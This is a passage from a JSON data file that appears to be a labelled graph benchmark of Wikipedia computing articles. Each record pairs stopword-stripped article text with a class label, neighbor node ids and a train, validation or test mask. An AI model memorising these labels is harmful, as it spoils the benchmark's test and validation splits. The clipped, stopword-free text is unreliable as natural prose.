    "text": "Cyber_threat_hunting:cyber threat hunting cyber threat hunting active cyber defence activity process proactively iteratively searching networks detect isolate advanced threats evade existing security solutions contrast traditional threat management measures firewalls intrusion detection systems ids malware sandbox computer security siem systems typically involve investigation evidence-based data warning potential threat threat hunting traditionally manual process security analyst sifts various data information using knowledge familiarity network create hypotheses potential threats limited lateral movement threat actors even effective efficient however threat hunting partially automated machine-assisted well case analyst uses software leverages machine learning user entity behavior analytics ueba inform analyst potential risks analyst investigates potential risks tracking suspicious behavior network thus hunting iterative process meaning must continuously carried loop beginning hypothesis hypothesis focus efforts known exploits potential bad actors assets data value using security data industry reports intelligence hypothesis formed hunt team sets prove disprove validity cyber threat hunts often employ automated manual tools techniques identify compromise detected three types hypotheses analyst researches hypothesis going vast amounts data network results stored used improve automated portion detection system serve foundation future hypotheses detection maturity level dml model expresses threat indicators detected different semantic levels high semantic indicators goal strategy tactics techniques procedure ttp valuable identify low semantic indicators network artifacts atomic indicators ip addresses siem tools typically provide indicators relatively low semantic levels therefore need develop siem tools provide threat indicators higher semantic levels representative notable vendors threat hunting software services include sans institute conducted research surveys effectiveness threat hunting track disrupt cyber adversaries early process possible according survey released 2017 60 hunt threats reported measurable improvements infosec programs based hunting efforts 91 report improvements speed accuracy response two types indicators sans institute identifies threat hunting maturity model follows cyberattackers operate undetected average 99 days obtain administrator credentials less three days according mandiant m-trends report study also showed 53 attacks discovered notification external party average company takes 170 days detect advanced threat 39 days mitigate 43 days recover according ponemon institute",
    "neighbors": [
      2976,
      612,
      8580,
      8998,
      10437,
      3433,
      5577,
      4972,
      1453,
      176,
      4689,
      11198,
      3637,
      9341,
      11611,
      4860,
      5245,
      8478
    ],
    "mask": "Test"
  },
  {
    "node_id": 10540,
    "label": 9,
    "text": "Canigó_(framework):canigó framework canigó name chosen java ee framework generalitat de catalunya canigó defined common technological framework development execution web applications corporative systems departments generalitat de catalunya covers various functionalities canigó architecture based model–view–controller abstraction process allows division application logics three main components able developed different rols team actually canigó architecture mvc structured framework divided 3 layers 4 cross-cutting modules canigó modular structure gives developers option use needed modules cover project requirements modules defined interfaces isolating chosen implementations canigó based series resources api integration jpa open source packages spring swagger ... also offers extensions packages adding wide catalog reusable components one important architectural basis decoupling frontend backend using rest api architecture allows independent development teams work frontend backend framework consists blocks specified spring open source framework written java platform first version created rod johnson october 2002 last release version 5.0.9 published first week september 2018 canigó designed help configuration web applications also simplify systems construction different pieces easily interchangeable visible service integration security services database connection transactionality etc ... spring provides complete testing system possible develop unitary tests uncoupling objects context making easier execution test cases external data access spring easy task framework manages resources also support apis able bear vast majority java industry data access technologies like jdbc hibernate jpa jdo ibatis main basis canigó architecture completely integrated group also modular best practices java web applications developing technologies actual components constitute system module core framework main features located user authorisation authentication applications access management system since canigo 3.2.0 jsf deprecated presentation layer technology presentation layer responsibility delegated outside framework another teams specialized front-end technologies angular react goal providing simple access different services offered generalitat de catalunya module enables application data persistence retrieval application database management systems module delivers additional features framework module adds feature applications generate execution instrumentation data data ready mined processed monitoring tools",
    "neighbors": [
      7364,
      6860,
      2038
    ],
    "mask": "None"
  },
  {
    "node_id": 10541,
    "label": 0,
    "text": "Text_Retrieval_Conference:text retrieval conference text retrieval conference trec ongoing series workshops focusing list different information retrieval ir research areas tracks co-sponsored national institute standards technology nist intelligence advanced research projects activity part office director national intelligence began 1992 part tipster text program purpose support encourage research within information retrieval community providing infrastructure necessary large-scale evaluation text retrieval methodologies increase speed lab-to-product transfer technology track challenge wherein nist provides participating groups data sets test problems depending track test problems might questions topics target extractable features uniform scoring performed systems fairly evaluated evaluation results workshop provides place participants collect together thoughts ideas present current future research work new tracks added new research needs identified list current trec 2018 1997 japanese counterpart trec launched first workshop 1999 called ntcir nii test collection ir systems 2000 clef european counterpart specifically vectored towards study cross-language information retrieval launched nist claims within first six years workshops effectiveness retrieval systems approximately doubled conference also first hold large-scale evaluations non-english documents speech video retrieval across languages additionally challenges inspired large body publications technology first developed trec included many world commercial search engines independent report rtii found one-third improvement web search engines 1999 2009 attributable trec enhancements likely saved 3 billion hours time using web search engines ... additionally report showed every 1 nist partners invested trec least 3.35 5.07 benefits accrued u.s. information retrieval researchers private sector academia one study suggests state art ad hoc search advanced substantially past decade referring search topically relevant documents small news web collections gigabytes advances types ad hoc search past decade example test collections created known-item web search found improvements use anchor text title weighting url length useful techniques older ad hoc test collections 2009 new billion-page web collection introduced spam filtering found useful technique ad hoc web search unlike past test collections test collections developed trec useful potentially helping researchers advance state art also allowing developers new commercial retrieval products evaluate effectiveness standard tests past decade trec created new tests enterprise e-mail search genomics search spam filtering e-discovery several retrieval domains trec systems often provide baseline research examples include conference made varied international group researchers developers 2003 93 groups academia industry 22 countries participating",
    "neighbors": [
      7780,
      9222,
      6762,
      1771,
      4272,
      11538,
      1913,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10542,
    "label": 7,
    "text": "Apptix:apptix apptix application service provider asp technology company providing hosted business services software service apptix serves businesses customers highly regulated industries healthcare apptix services include microsoft exchange email voip phone service microsoft sharepoint collaboration services web conferencing/secure im email encryption mobile device management messaging active directory management archiving backup services september 2015 apptix acquired godaddy inc 22.5 million cash deal apptix founded 1997 spun telecomputing asa oslo norway company headquartered herndon virginia usa additional locations florida texas apptix publicly traded oslo stock exchange ose app apptix acquired integrated hosted exchange vendors asp-one mi8 mailstreet 2011 revenues totaled us 40.7 million 5 38.6 millionin 2010 positive net income trends continued first three quarters 2012 apptix microsoft partner offering hosted microsoft exchange microsoft sharepoint services apptix technology partners include parallels well symantec sonian mozy apptix ’ channel partners include insight enterprises megapath cincinnati bell inc. web.com sprint nextel corporation",
    "neighbors": [
      3161,
      929,
      467,
      9569
    ],
    "mask": "None"
  },
  {
    "node_id": 10543,
    "label": 3,
    "text": "POWER6:power6 power6 microprocessor developed ibm implemented power isa v.2.03 became available systems 2007 succeeded power5+ ibm flagship power microprocessor claimed part eclipz project said goal converging ibm server hardware practical hence ipz acronym iseries pseries zseries power6 described international solid-state circuits conference isscc february 2006 additional details added microprocessor forum october 2006 next isscc february 2007 formally announced may 21 2007 released june 8 2007 speeds 3.5 4.2 4.7 ghz company noted prototypes reached 6 ghz power6 reached first silicon middle 2005 bumped 5.0 ghz may 2008 introduction p595 power6 dual-core processor core capable two-way simultaneous multithreading smt power6 approximately 790 million transistors 341 mm large fabricated 65 nm process notable difference power5 power6 executes instructions in-order instead out-of-order change often requires software recompiled optimal performance power6 still achieves significant performance improvements power5+ even unmodified software according lead engineer power6 project power6 also takes advantage viva-2 virtual vector architecture enables combination several power6 nodes act single vector processor core two integer units two binary floating-point units altivec unit novel decimal floating-point unit binary floating-point unit incorporates many microarchitectures logic circuit latch integration techniques achieve 6-cycle 13-fo4 pipeline according company paper unlike servers ibm competitors power6 hardware support ieee 754 decimal arithmetic includes first decimal floating-point unit integrated silicon 50 new floating point instructions handle decimal math conversions binary decimal feature also added z10 microprocessor featured system z10 core 64 kb four-way set-associative instruction cache 64 kb data cache eight-way set-associative design two-stage pipeline supporting two independent 32-bit reads one 64-bit write per cycle core semi-private 4 mib unified l2 cache cache assigned specific core fast access two cores share 32 mib l3 cache die using 80 gb/s bus power6 connect 31 processors using two inter node links 50 gb/s supports 10 logical partitions per core limit 254 per system interface service processor monitors adjusts performance power according set parameters ibm also makes use 5 ghz duty-cycle correction clock distribution network processor network company implements copper distribution wire 3 µm wide 1.2 µm thick power6 design uses dual power supplies logic supply 0.8-to-1.2 volt range sram power supply 150-mv higher thermal characteristics power6 similar power5 dr frank soltis ibm chief scientist said ibm solved power leakage problems associated high frequency using combination 90 nm 65 nm parts power6 design slightly enhanced power6+ introduced april 2009 shipping power 560 570 systems since october 2008 added memory keys secure memory partition feature taken ibm mainframe processors range power6 systems includes express models 520 550 560 enterprise models 570 595 various system models designed serve sized business example 520 express marketed small businesses power 595 marketed large multi-environment data centers main difference express enterprise models latter include capacity upgrade demand cuod capabilities hot-pluggable processor memory books ibm also offers four power6 based blade servers specifications shown table blades support aix linux bladecenter h chassis supported blades running aix linux bladecenter e ht chassis support blades running aix linux supercomputing 2007 sc07 conference reno new water-cooled power 575 revealed 575 composed 2u nodes 32 power6 cores 4.7 ghz 256 gb ram 448 cores installed single frame",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      6926,
      3472,
      4881,
      5393,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9126,
      9391,
      4017,
      5297,
      7218,
      10675,
      1461,
      7607,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      2625,
      10180,
      8136,
      336,
      8530,
      3540,
      342,
      9302,
      1115,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      10985,
      10734,
      1776,
      3185,
      4465,
      4211,
      5235,
      630,
      8058,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 10544,
    "label": 3,
    "text": "Bosconian:bosconian bosconian allows player ship freely roam across open space scrolls directions game also radar tracks position player ship enemy formation attacks space stations objective bosconian score many points possible destroying enemy missiles bases player controls small fighter ship move eight directions fire forward backward round consists number green enemy bases must destroyed advance next round semi-transparent automap helps identify location station consists six cannons arranged hexagon surrounding central core player must either destroy six cannons 200 points shoot core destroy station 1,500 points later rounds core capable defending opening closing launching missiles additionally player must avoid destroy stationary asteroids 10 points mines 20 points variety enemy missiles ships attempt collide ship enemy bases also occasionally launch squadron ships formation attacks — destroying leader causes remaining enemies disperse destroying enemies formation scores extra bonus points spy ship worth random bonus value also appear occasionally must destroyed round go condition red regardless long player taken throughout game digitized voice alerts player various events bosconian definite ending continue player lost lives similar galaga bosconian rolls round 255 round 0 causing game behave abnormally round player successfully complete round 0 game continues round 1 though player started upon scoring 2,000,000 points lives thereafter bosconian 1982 arcade award best science fiction/fantasy coin-op game january 1983 beating atari gravitar sega zaxxon bosconian later appeared several namco museum compilations playstation consoles game also released jakks pacific tv game controllers released part pac-man arcade party arcade machine 2010 home computer sequel bosconian '87 released 1987 amstrad cpc commodore 64 zx spectrum spiritual successor blast released 1989 japan runs namco system 1 hardware bears resemblance namco dragon spirit bosconian related title final blaster released 1990 pc-engine japan featured gameplay akin blast bosconian one first games continuation screen edged fantasy released one month earlier 1981 feature could disabled entirely arcade owners want changing dip switch setting",
    "neighbors": [
      11522,
      1060,
      9093,
      3307,
      2540,
      9006,
      10287,
      1776,
      10931,
      8663
    ],
    "mask": "Test"
  },
  {
    "node_id": 10545,
    "label": 4,
    "text": "Internet_Crimes_Against_Children:internet crimes children internet crimes children icac task-force started united states department justice office juvenile justice delinquency prevention ojjdp 1998 primary goals provide state local law enforcement agencies tools prevent internet crimes children encouraging multi-jurisdictional cooperation well educating law enforcement agents parents teachers aims icac task forces catch distributors child pornography internet whether delivered on-line solicited on-line distributed channels catch sexual predators solicit victims internet chat rooms forums methods currently fifty states participate icac",
    "neighbors": [
      1639,
      10446,
      7887,
      10290,
      796
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10546,
    "label": 4,
    "text": "Sentrigo:sentrigo sentrigo privately held software company located santa clara california usa acquisition april 2011 mcafee company founded 2006 nathan shuchami slavik markovich address several key challenges database security specifically inability monitor activity privileged users established credentials nefarious means difficulty maintaining dbms current patch level company products expanded include broader suite database security offerings including database audit vulnerability assessment well investors sentrigo included benchmark capital stata ventures juniper networks hedgehog family products providing vulnerability assessment database activity monitoring purposes reducing risks data breach meeting compliance regulations related sensitive data hedgehog allows customers protect databases oracle microsoft sql server sybase without interfering day-to-day operations company primary product introduced 2007 hedgehog enterprise provides core monitoring capability based sensor server model sensor resides database server os monitors memory/cache suspect database transactions sending alerts real-time management console thus unlike network-based host-based intrusion detection systems ids intrusion prevention systems ips hedgehog fully monitor databases running virtual machines even cloud server java-based application communicates sensors centrally monitor hundreds databases based set policies rules system audit alert suspend sessions violate preset conditions announced september 2010 hedgehog dbscanner enterprise vulnerability assessment solution databases includes capabilities automatically finding databases network subjects 3,000 different security checks reports provide details discovered vulnerabilities current patch level weak passwords shared accounts configuration errors insecure database code dbscanner implemented along hedgehog enterprise case shares common management console run standalone module vpatch solution virtual patching databases overcome problem many customers unable apply security patches databases timely manner may due inability schedule downtime production system time lag testing 3rd party support applications top database numerous reasons sentrigo vpatch includes set rules generate alerts known vulnerabilities exploited used terminate attackers database sessions vpatch rules updated frequent basis new security updates issued dbms vendor new vulnerabilities discovered sentrigo research team partners common practice developing applications web applications particular use fat database accounts common schema pooled connections enhance application performance using approach raises problem full end-to-end user tracking database layer database unable see end-user details like username ip address seeing application server ip common schema account hedgehog identifier solves problem providing application server plug-in captures end-user information transparently propagates database tier using standard database apis application changes required identifier supports custom java .net applications well major business applications technical details available blog entry fuzzor fuzzer oracle open source software tool developed sentrigo fuzzor provides database administrators programmers ability test pl/sql code security vulnerabilities tool discovers vulnerabilities attempting exploit code particularly helpful finding sql injection buffer overflow vulnerabilities sentrigo provides tool free charge",
    "neighbors": [
      704,
      1314,
      4194,
      10340,
      8742,
      3573,
      11030,
      5245
    ],
    "mask": "None"
  },
  {
    "node_id": 10547,
    "label": 9,
    "text": "MDL_(programming_language):mdl programming language mdl datatypes lisp mit design language programming language descendant language lisp initial purpose provide high level language support dynamic modeling group massachusetts institute technology mit project mac initially developed 1971 pdp-10 computer time-sharing operating system named incompatible timesharing system later ran tenex tops-20 bsd aegis initial development team consisted gerald sussman carl hewitt artificial intelligence lab chris reeve bruce daniels david cressey dynamic modeling group later stu galley also dynamic modeling group wrote mdl documentation mdl initially called muddle style self-deprecating humor widely understood appreciated outside project mac early citadels information technology name sanitized mdl mdl provides several enhancements classic lisp supports several built-in data types including lists strings arrays user-defined data types offers multithreaded expression evaluation coroutines variables carry local value within scope global value passing data scopes advanced built-in functions supported interactive debugging mdl programs incremental development reconstruction source programs object programs although mdl obsolete features incorporated later versions lisp gerald sussman went develop scheme language collaboration guy steele later wrote specifications common lisp java carl hewitt already published idea language planner mdl project began subsequent thinking planner reflected lessons learned building mdl planner concepts influenced languages prolog smalltalk smalltalk simula turn influenced hewitt future work actor model largest influence mdl software genre interactive fiction game named zork sometimes called dungeon first written mdl later reeve daniels galley members dynamic modeling went start infocom company produced many early commercial works interactive fiction original source code mainframe environment snippet shown downloaded originally russian mirror syntaxhighlight /syntaxhighlight",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      5677,
      3119,
      2105,
      3132,
      6717,
      577,
      8258,
      8771,
      8262,
      2120,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      1147,
      7805,
      11390,
      9345,
      1159,
      9865,
      655,
      9877,
      4774,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      8421,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      273,
      1301,
      8474,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      311,
      6969,
      11075,
      10568,
      3408,
      6994,
      11604,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      9151,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "None"
  },
  {
    "node_id": 10548,
    "label": 3,
    "text": "StrongARM:strongarm strongarm family computer microprocessors developed digital equipment corporation manufactured late 1990s implemented arm v4 instruction set architecture later sold intel 1997 continued manufacture replacing xscale early 2000s strongarm collaborative project dec advanced risc machines create faster arm microprocessor strongarm designed address upper-end low-power embedded market users needed performance arm could deliver able accept external support targets devices newer personal digital assistants set-top boxes traditionally semiconductor division dec located massachusetts order gain access design talent silicon valley dec opened design center palo alto california design center led dan dobberpuhl main design site strongarm project another design site worked project austin texas created ex-dec designers returning apple computer motorola project set 1995 quickly delivered first design sa-110 dec agreed sell strongarm intel part lawsuit settlement 1997 intel used strongarm replace ailing line risc processors i860 i960 semiconductor division dec sold intel many engineers palo alto design group moved sibyte start-up company designing mips system-on-a-chip soc products networking market austin design group spun become alchemy semiconductor another start-up company designing mips socs hand-held market new strongarm core developed intel introduced 2000 xscale sa-110 first microprocessor strongarm family first versions operating 100 160 200 mhz announced 5 february 1996 announced samples versions available volume production slated mid-1996 faster 166 233 mhz versions announced 12 september 1996 samples versions available announcement volume production slated december 1996 throughout 1996 sa-110 highest performing microprocessor portable devices towards end 1996 leading cpu internet/intranet appliances thin client systems sa-110 first design win apple messagepad 2000 also used number products including acorn computers risc pc eidos optima video editing system sa-110 lead designers daniel w. dobberpuhl gregory w. hoeppner liam madden richard t. witek sa-110 simple microarchitecture scalar design executed instructions in-order five-stage classic risc pipeline microprocessor partitioned several blocks ibox ebox immu dmmu biu wb pll ibox contained hardware operated first two stages pipeline program counter fetched decoded issued instructions instruction fetch occurs first stage decode issue second ibox decodes complex instructions arm instruction set translating sequences simpler instructions ibox also handled branch instructions sa-110 branch prediction hardware mechanisms speedy processing execution starts stage three hardware operates stage contained ebox comprises register file arithmetic logic unit alu barrel shifter multiplier condition code logic register file three read ports two write ports alu barrel shifter executed instructions single cycle multiplier pipelined latency multiple cycles immu dmmu memory management units instructions data respectively mmu contained 32-entry fully associative translation lookaside buffer tlb map 4 kb 64 kb 1 mb pages write buffer wb eight 16-byte entries enables pipelining stores bus interface unit biu provided sa-110 external interface pll generates internal clock signal external 3.68 mhz clock signal designed dec contracted centre suisse d'electronique et de microtechnique csem located neuchâtel switzerland instruction cache data cache capacity 16 kb 32-way set-associative virtually addressed sa-110 designed used slow therefore low-cost memory therefore high set associativity allows higher hit rate competing designs use virtual addresses allows memory simultaneously cached uncached caches responsible transistor count take half die area sa-110 contained 2.5 million transistors 7.8 mm 6.4 mm large 49.92 mm fabricated dec proprietary cmos-6 process fab 6 fab hudson massachusetts cmos-6 dec sixth-generation complementary metal–oxide–semiconductor cmos process cmos-6 0.35 µm feature size 0.25 µm effective channel length use sa-110 three levels aluminium interconnect used power supply variable voltage 1.2 2.2 volts v enable designs find balance power consumption performance higher voltages enable higher clock rates sa-110 packaged 144-pin thin quad flat pack tqfp sa-1100 derivative sa-110 developed dec announced 1997 sa-1100 targeted portable applications pdas differs sa-110 providing number features desirable applications accommodate features data cache reduced size 8 kb extra features integrated memory pcmcia color lcd controllers connected on-die system bus five serial i/o channels connected peripheral bus attached system bus memory controller supported fpm edo dram sram flash rom pcmcia controller supports two slots memory address data bus shared pcmcia interface glue logic required serial i/o channels implement slave usb interface sdlc two uarts irda interface mcp synchronous serial port sa-1100 companion chip sa-1101 introduced intel 7 october 1998 sa-1101 provided additional peripherals complement integrated sa-1100 video output port two ps/2 ports usb controller pcmcia controller replaces sa-1100 design device started dec partially complete acquired intel finish design fabricated dec former hudson massachusetts fabrication plant also sold intel sa-1100 contained 2.5 million transistors measured 8.24 mm 9.12 mm 75.15 mm fabricated 0.35 μm cmos process three levels aluminium interconnect packaged 208-pin tqfp one early recipients processor was-ill-fated psion netbook consumer oriented sibling psion series 7 sa-1110 derivative sa-110 developed intel announced 31 march 1999 positioned alternative sa-1100 announcement samples set june 1999 volume later year intel discontinued sa-1110 early 2003 sa-1110 available 133 206 mhz versions differed sa-1100 featuring support 66 mhz 133 mhz version 103 mhz 206 mhz version sdram companion chip provided additional support peripherals sa-1111 sa-1110 packaged 256-pin micro ball grid array used mobile phones personal data assistants pdas compaq later hp ipaq hp jornada sharp sl-5x00 linux based platforms simputer also used run intel web tablet tablet device considered potentially first introduce large screen portable web browsing intel dropped product prior launch 2001 sa-1500 derivative sa-110 developed dec initially targeted set-top boxes designed manufactured low volumes dec never put production intel sa-1500 available 200 300 mhz sa-1500 featured enhanced sa-110 core on-chip coprocessor called attached media processor amp on-chip sdram i/o bus controller sdram controller supported 100 mhz sdram i/o controller implemented 32-bit i/o bus may run frequencies 50 mhz connecting peripherals sa-1501 companion chip amp implemented long instruction word instruction set containing instructions designed multimedia integer floating-point multiply–accumulate simd arithmetic long instruction word 64 bits wide specifies arithmetic operation branch load/store instructions operate operands 64-entry 36-bit register file set control registers amp communicates sa-110 core via on-chip bus shares data cache sa-110 amp contained alu shifter branch unit load/store unit multiply–accumulate unit single-precision floating-point unit amp supported user-defined instructions via 512-entry writable control store sa-1501 companion chip provided additional video audio processing capabilities various i/o functions ps/2 ports parallel port interfaces various peripherals sa-1500 contains 3.3 million transistors measures 60 mm fabricated 0.28 µm cmos process used 1.5 2.0 v internal power supply 3.3 v i/o consuming less 0.5 w 100 mhz 2.5 w 300 mhz packaged 240-pin metal quad flat package 256-ball plastic ball grid array",
    "neighbors": [
      7170,
      9739,
      4108,
      9741,
      5649,
      38,
      4139,
      8253,
      7234,
      3142,
      4679,
      2635,
      2638,
      10325,
      1119,
      3175,
      4204,
      8820,
      630,
      4217,
      8325,
      8327,
      659,
      6804,
      8851,
      666,
      4773,
      7852,
      9391,
      4276,
      9913,
      2237,
      5309,
      8383,
      10945,
      6339,
      4821,
      7382,
      2788,
      7911,
      9959,
      5356,
      9964,
      5358,
      5871,
      757,
      3317,
      9978,
      5883,
      2814,
      5380,
      5386,
      6926,
      6415,
      4886,
      3352,
      2862,
      6979,
      5444,
      3911,
      5963,
      11604,
      2396,
      6495,
      1377,
      10601,
      2925,
      4465,
      6001,
      5503,
      3459,
      3973,
      9095,
      9611,
      398,
      6544,
      8082,
      5523,
      9111,
      4508,
      9638,
      426,
      10669,
      1461,
      9155,
      4553,
      9163,
      1998,
      7631,
      5073,
      4569,
      2524,
      7134,
      1000,
      7657,
      8684,
      10734,
      499
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10549,
    "label": 1,
    "text": "Art_Loss_Register:art loss register art loss register alr world largest database stolen art computerized international database captures information lost stolen art antiques collectables alr london-based independent profit corporate offspring new york-based nonprofit international foundation art research ifar range functions served alr grown number listed items increased database used collectors art trade insurers law enforcement agencies worldwide 1991 ifar helped create art loss register alr commercial enterprise expand market database ifar managed alr u.s. operations 1997 1998 alr assumed full responsibility ifar database although ifar retains ownership 1992 database comprised 20,000 items grew size nearly tenfold first decade first steps towards alr began establishment ifar new york 1969 among explicit goals ifar created compile information stolen art response growth international art thefts ifar began publishing stolen art alert 1976 1990 ifar updating catalogue stolen art 10 times year magnitude problem overwhelmed grown 20,000 manual records ifar successful recording details losses good first step 1991 alr established london commercial company earning fees insurers theft victims founding shareholders included insurance auction houses think conflict interest christie cite note-72 majority shares owned founder julian radcliffe significant capital investment needed ifar could computerised database made available worldwide law enforcement agencies others response growth development ifar museum officials revised policies based assumption discussing theft would scare away potential donors afr initially formed partnership alr later split disagreements strategy issues control change policies secrecy ones emphasize openness gradual mirroring expectation publicizing theft likely promote recovery alr widely criticised methods actions chairman julian radcliffe register consistently lost money personal cash infusions chairman approach adopted alr criticised register contacted owners stolen art saying information revealing fee paid another instance alr lied sotheby ’ saying paintings stolen paintings shipped london seized alr likened approach police misleading suspect investigation",
    "neighbors": [
      4545
    ],
    "mask": "None"
  },
  {
    "node_id": 10550,
    "label": 4,
    "text": "Datto_(company):datto company datto inc. american cybersecurity data backup company founded 2007 norwalk connecticut 2017 became subsidiary vista equity partners merged autotask corporation founded 2007 connecticut software programmer austin mcchord mcchord initially built marketed hand-made data backup devices securing first customers 2008 afterwards built system allowed data synchronization two computers building version zenith infotech ran linux end 2009 company 70,000 monthly sales new datto product 2010 caused old systems crash replacement system designed scratch siris released several months later free upgrade 2011 datto credited helping local hospitals impacted tornado joplin missouri retrieve data 2011 sales 9 million following year 25 million established business model sold products primarily managed service providers 2013 company continuing focus small mid-size businesses clients susan g. komen cure several nfl teams september 2013 company raised 25 million first round venture capital financing led general catalyst partners time datto 225 employees posted four consecutive years 300 percent annual growth 2014 datto inc. purchased backupify cloud-to-cloud backup company backupify focused backing data servers complementing datto focus local private clouds november 2015 company garnered 75 million series b funding round mostly led technology crossover ventures 2015 became connecticut first unicorn company early 2017 datto acquired open mesh datto acquired vista equity partners around 1.5 billion late 2017 part deal datto merged vista portfolio company autotask corporation austin mcchord remained ceo combined company mcchord stepped ceo october 2018 remaining board recent years company increased employee number significantly datto 550 employees november 2015 700 employees january 2017 883 workers october 2017 434 norwalk 1,300 employees november 2017 march 2018 number grown 1,400 month datto ranked first among midsize companies democrat chronicle ’ top workplaces list datto builds hardware software data backup recovery purposes 2016 company released siris 3 data protection platform claiming first system market ransomware detection capability",
    "neighbors": [
      1970,
      9098,
      8301,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 10551,
    "label": 1,
    "text": "Codd's_12_rules:codd 12 rules codd twelve rules set thirteen rules numbered zero twelve proposed edgar f. codd pioneer relational model databases designed define required database management system order considered relational i.e. relational database management system rdbms sometimes jokingly referred codd twelve commandments codd produced rules part personal campaign prevent vision original relational database diluted database vendors scrambled early 1980s repackage existing products relational veneer rule 12 particularly designed counter positioning rule 0 foundation rule rule 1 information rule rule 2 guaranteed access rule rule 3 systematic treatment null values rule 4 dynamic online catalog based relational model rule 5 comprehensive data sublanguage rule rule 6 view updating rule rule 7 possible high-level insert update delete rule 8 physical data independence rule 9 logical data independence rule 10 integrity independence rule 11 distribution independence rule 12 nonsubversion rule",
    "neighbors": [
      10413,
      2901,
      9286,
      9397
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10552,
    "label": 3,
    "text": "Genghis_Khan_(video_game):genghis khan video game genghis khan original full title 1987 turn-based strategy game developed koei originally released nec pc-9801 msx sharp x68000 1988 dos nes 1990 amiga 1990 actually second game series 1985 aoki ōkami shiroki mejika also pc-88 pc-98 msx game takes player inside virtual life either genghis khan one archrivals player must arrange marriages father children appoint family members governmental positions fight order conquer old world armies must drafted soldiers must trained player rule lands england japan game two different ways play first mongol conquest begins year 1175 a.d one player mode players assume control lord temujin must conquer land keeping economy stable army ready fight attacking lands second world conquest goal conquer every opposing country world conquest begins year 1206 a.d started choosing number players difficulty supports 1-4 players players must choose want genghis khan mongols alexios byzantine richard england yoritomo japan player must randomly select stats leader successors player must stop random number choose certain stat done stats chosen certain character redone everyone ready go game begins countries eurasia cycle goes country means used turn comes player country get make three choices choices include training troops buying certain product/quantity merchant drafting soldiers sending treaty going war act takes one choice away three choices used cycle continues every country used turns season changes cycle goes different order seasons determine must pay troops farmers harvest crop food must distributed etc 1989 computer gaming world called genghis khan toughest satisfying richest historical simulation yet 1990 survey pre-20th century wargames magazine gave four five stars 1993 three stars orson scott card viewed unfavorably writing compute compared romance tedium back regarding gameplay another reviewer magazine stated genghis khan excellent prerequisite real leadership experience forces gauge resources making decisions 2008 armağan yavuz co-founder turkish developer taleworlds cited koei genghis khan influence mount blade series",
    "neighbors": [
      9006,
      9166,
      1566
    ],
    "mask": "Test"
  },
  {
    "node_id": 10553,
    "label": 7,
    "text": "Oracle_Fusion_Middleware:oracle fusion middleware oracle fusion middleware fmw also known fusion middleware consists several software products oracle corporation fmw spans multiple services including java ee developer tools integration services business intelligence collaboration content management fmw depends open standards bpel soap xml jms oracle fusion middleware provides software development deployment management service-oriented architecture soa includes oracle calls hot-pluggable architecture designed facilitate integration existing applications systems software vendors ibm microsoft sap ag many products included fmw banner qualify middleware products fusion middleware essentially represents re-branding many oracle products outside oracle core database applications-software offerings—compare oracle fusion oracle acquired many fmw products via acquisitions includes products bea systems stellent order provide standards-based software assist business process automation hp incorporated fmw service-oriented architecture soa portfolio oracle leveraged configurable network computing cnc technology acquired peoplesoft/jd edwards 2005 purchase oracle fusion applications based oracle fusion middleware finally released september 2010 according oracle 2013 120,000 customers using fusion middleware includes 35 world 50 largest companies 750 businessweek global 1000 fmw also supported 7,500 partners january 2008 oracle webcenter content formerly universal content management infoworld technology year award best enterprise content manager oracle soa suite winning award best enterprise service bus 2007 gartner wrote oracle fusion middleware reached degree completeness puts par cases ahead competing software stacks reported revenue suite us 1 billion fy06 estimating revenue genuinely middleware aspects us 740 million",
    "neighbors": [
      1539,
      5384,
      4233,
      4107,
      9867,
      9467,
      6419,
      8353,
      8994,
      10020,
      8871,
      1707,
      5677,
      9010,
      9012,
      1594,
      8122,
      3521,
      6338,
      9665,
      2501,
      6341,
      1612,
      597,
      2901,
      1367,
      5210,
      1755,
      6107,
      2269,
      479,
      1250,
      10340,
      3558,
      4199,
      7022,
      8434,
      10486,
      1399,
      3323
    ],
    "mask": "Train"
  },
  {
    "node_id": 10554,
    "label": 3,
    "text": "Acrojet:acrojet acrojet 1985 flight simulator video game microprose originally developed commodore 64 c64 ported amstrad cpc msx zx spectrum nec pc-8801 nec pc-9801 emphasized aerial acrobatic flying maneuverability player flies bd5j small agile jet player complete series eight stunt courses routines jet example one set player fly plane around series pylons another player must fly figure eight stunts get harder play progresses game parameters weather configurable ten acrobatic events played four players four levels difficulty ten events player must fly series obstacles compute called acrojet realistic simulation also fun play stating game like microprose products emphasized accurate details controls original c64 version programmed william mike denman edward hill jr sound music done sid meier also researched science along denman stunts bill stealey actually retired united states air force lt colonel command pilot michael haire credited artwork",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10555,
    "label": 9,
